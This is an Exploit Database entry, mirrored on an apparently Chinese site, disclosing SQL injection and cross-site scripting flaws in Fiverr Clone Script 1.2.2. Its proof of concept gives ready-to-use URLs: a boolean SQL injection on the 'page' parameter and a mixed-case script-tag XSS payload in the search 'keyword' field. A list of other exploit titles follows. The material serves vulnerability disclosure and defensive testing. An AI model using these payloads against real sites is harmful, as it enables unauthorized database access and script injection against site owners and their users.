Fiverr Clone Script 1.2.2 – SQL Injection / Cross-Site Scripting

Exploit Database
17 阅读

作者： Mr Winst0n

日期： 2019-04-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46637/

# Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: Apr 1, 2019
# Vendor Homepage: https://www.phpscriptsmall.com
# Software Link : https://www.phpscriptsmall.com/product/fiverr-clone-script/
# Tested Version: 1.2.2
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/?page=[SQLi]
# http://localhost/search-results.php?category=[Category id]&subcategory=[Subcategory id]&keyword=[XSS]

# http://localhost/?page=2%20%27%20OR%201%20=%201%20--
# http://localhost/search-results.php?category=32&subcategory=63&keyword=<ScrIpt>alert(1)</sCrIpT>&project_search=#

last Exploits
Fiverr Clone Script 1.2.2 – SQL Injection / Cross-Site Scripting的更多信息

Joomla! Component com_libros – SQL Injection：
Employee Work Schedule 5.9 – ‘cal_id’ SQL Injection：
Classified Script – c-BrowseClassified Cross-Site Scripting：
Joomla! Component JEXTN Video Gallery 3.0.5 – ‘id’ SQL Injection：
Joomla! Component People 1.0.0 – SQL Injection：
EyesOfNetwork (EON) 5.1 – SQL Injection：
Subrion CMS 4.0.5 – Cross-Site Request Forgery (Add Admin)：
Joomla! Component com_oziogallery2 / IMAGIN – Arbitrary File Write：